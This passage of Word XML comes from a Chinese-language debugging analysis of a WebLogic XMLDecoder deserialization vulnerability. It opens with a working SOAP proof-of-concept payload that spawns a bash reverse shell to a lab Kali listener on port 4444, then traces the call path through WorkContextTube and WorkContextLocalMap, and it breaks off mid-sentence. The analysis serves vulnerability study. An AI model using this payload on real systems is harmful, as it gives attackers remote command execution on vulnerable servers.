            </w:r>
          </w:p>
          <w:p w14:paraId="0B8E8975" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;soapenv:Header&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="763BF596" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75498283" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;java version="1.4.0" class="java.beans.XMLDecoder"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2020C1B8" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;void class="java.lang.ProcessBuilder"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23B47980" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;array class="java.lang.String" length="3"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DA5EC2E" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;void index="0"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="416281E5" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;string&gt;/bin/bash&lt;/string&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B1DF838" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/void&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47C867DE" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;void index="1"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E457C4C" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;string&gt;-c&lt;/string&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ABE68D7" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/void&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75C8FC69" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;void index="2"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A882F2C" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>&lt;string&gt;bash -i &amp;gt;&amp;amp; /dev/tcp/192.168.2.128/4444 0&amp;gt;&amp;amp;1&lt;/string&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15867B89" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/void&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="633DF45C" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/array&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AD45319" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;void method="start"/&gt;&lt;/void&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E84D295" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/java&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="688F5234" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/work:WorkContext&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D5177F2" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/soapenv:Header&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19735DB3" w14:textId="77777777" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;soapenv:Body/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28051C1B" w14:textId="79DE6D3F" w:rsidR="00A41F96" w:rsidRDefault="00320897" w:rsidP="0062788E">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/soapenv:Envelope&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F846CD3" w14:textId="4FB3E3E1" w:rsidR="00320897" w:rsidRDefault="00567764" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>同时在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中监听</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433A0CA0" w14:textId="4845869D" w:rsidR="00567764" w:rsidRDefault="00567764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2E4A11DF" wp14:editId="52C2824C">
            <wp:extent cx="5274310" cy="1229360"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="6" name="图片 6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游戏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58D" w14:textId="4D6D8765" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送之后回到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>idea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发现程序已经停留在我们下的断点处；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF01D8E" w14:textId="36ABA889" w:rsidR="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且</w:t>
      </w:r>
      <w:r w:rsidRPr="00320897">
        <w:t>processRequest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法的参数的值是我们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557DD75A" w14:textId="214BE35D" w:rsidR="00320897" w:rsidRPr="00320897" w:rsidRDefault="00320897" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以该函数是在对我们传入的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据做一些处理，具体做了哪些操作需要进一步跟进分析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFE5C68" w14:textId="16EB6070" w:rsidR="00320897" w:rsidRDefault="00320897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2E8FCC84" wp14:editId="498FE7AD">
            <wp:extent cx="5274310" cy="1771015"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635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3630" w14:textId="6EFAE9DE" w:rsidR="00567764" w:rsidRDefault="00567764" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>38-41</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行之间的操作最终都是为了得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEAE7C1" w14:textId="4A3CA3F8" w:rsidR="00567764" w:rsidRDefault="00567764" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此着重关注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行里对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做操作的</w:t>
      </w:r>
      <w:r w:rsidRPr="00567764">
        <w:t>readHeaderOld</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136B44C0" w14:textId="14163A0A" w:rsidR="00567764" w:rsidRDefault="00567764" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跟进、步入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BD4868" w14:textId="48C4FE79" w:rsidR="00567764" w:rsidRDefault="00567764" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来到</w:t>
      </w:r>
      <w:r w:rsidRPr="00567764">
        <w:t>weblogic.wsee.jaxws.workcontext</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00567764">
        <w:t>WorkContextTube</w:t>
      </w:r>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00567764">
        <w:t>readHeaderOld</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486347B7" w14:textId="228AFF0C" w:rsidR="00567764" w:rsidRDefault="00567764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49673A5D" wp14:editId="3BD4FFA5">
            <wp:extent cx="5274310" cy="1308735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="571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98E" w14:textId="4C717AE5" w:rsidR="00567764" w:rsidRDefault="00567764" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行执行到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一直显示的是“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，即空，但是执行到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行时值发生了变化，</w:t>
      </w:r>
      <w:r w:rsidR="00C950B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且此时调用了</w:t>
      </w:r>
      <w:r w:rsidR="00C950B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidR="00C950B6">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00C950B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数的</w:t>
      </w:r>
      <w:r w:rsidR="00C950B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>toByte</w:t>
      </w:r>
      <w:r w:rsidR="00C950B6">
        <w:t>Array(),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此着重关注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个参数；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08705934" w14:textId="6E5D9FA1" w:rsidR="00567764" w:rsidRDefault="00567764" w:rsidP="0062788E">
      <w:pPr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18C1D010" wp14:editId="47E0AF0B">
            <wp:extent cx="5274310" cy="1406525"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175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7B4" w14:textId="4FA84BF7" w:rsidR="00C950B6" w:rsidRDefault="00C950B6" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数传入了</w:t>
      </w:r>
      <w:r w:rsidRPr="00C950B6">
        <w:t>receive(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidR="00B45D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D109C0" w14:textId="3418626D" w:rsidR="00C950B6" w:rsidRDefault="00C950B6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2684CFF5" wp14:editId="0DB301A0">
            <wp:extent cx="5274310" cy="728345"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9" name="图片 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里有图片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35B" w14:textId="3721BF7C" w:rsidR="00C950B6" w:rsidRDefault="00C950B6" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该方法首先实例化了一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00C950B6">
        <w:t>WorkContextMapInterceptor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，接着调用了该类中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C950B6">
        <w:t>receiveRequest</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，并且将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为参数传入了，这里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是前面传入的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6354D5C7" w14:textId="1A77295A" w:rsidR="00C950B6" w:rsidRDefault="00C950B6" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>步入跟进</w:t>
      </w:r>
      <w:r w:rsidR="00B45D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidR="00B45D5C" w:rsidRPr="00B45D5C">
        <w:t>weblogic.workarea</w:t>
      </w:r>
      <w:r w:rsidR="00B45D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B45D5C" w:rsidRPr="00B45D5C">
        <w:t>WorkContextMapImpl</w:t>
      </w:r>
      <w:r w:rsidR="00B45D5C">
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00B45D5C" w:rsidRPr="00B45D5C">
        <w:t>receiveRequest</w:t>
      </w:r>
      <w:r w:rsidR="00B45D5C">
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FAA1A9" w14:textId="15C426DC" w:rsidR="00C950B6" w:rsidRDefault="00C950B6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26C161F1" wp14:editId="4008341E">
            <wp:extent cx="5274310" cy="248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619" w14:textId="687A2295" w:rsidR="00C950B6" w:rsidRDefault="00C950B6" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里</w:t>
      </w:r>
      <w:r w:rsidR="00B45D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>又</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数传入了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>receiveRequest</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidR="00B45D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，继续跟进该方法；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308D9382" w14:textId="5B492351" w:rsidR="00B45D5C" w:rsidRDefault="00B45D5C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07D5F9FD" wp14:editId="599C467E">
            <wp:extent cx="5274310" cy="1242060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11" name="图片 1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的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C893" w14:textId="56D89492" w:rsidR="00B45D5C" w:rsidRDefault="00B45D5C" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45D5C">
        <w:t>weblogic.workare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45D5C">
        <w:t>WorkContextLocalMap</w:t>
      </w:r>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>receiveRequest</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>65</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行又调用了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>readEntry</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为了参数，步入跟进该方法；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC898CE" w14:textId="649A65BA" w:rsidR="00B45D5C" w:rsidRDefault="00B45D5C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123D7906" wp14:editId="7DE98481">
            <wp:extent cx="5274310" cy="3524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E428" w14:textId="0DBB8D9A" w:rsidR="00B45D5C" w:rsidRDefault="00B45D5C" w:rsidP="0062788E">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跟进到了</w:t>
      </w:r>
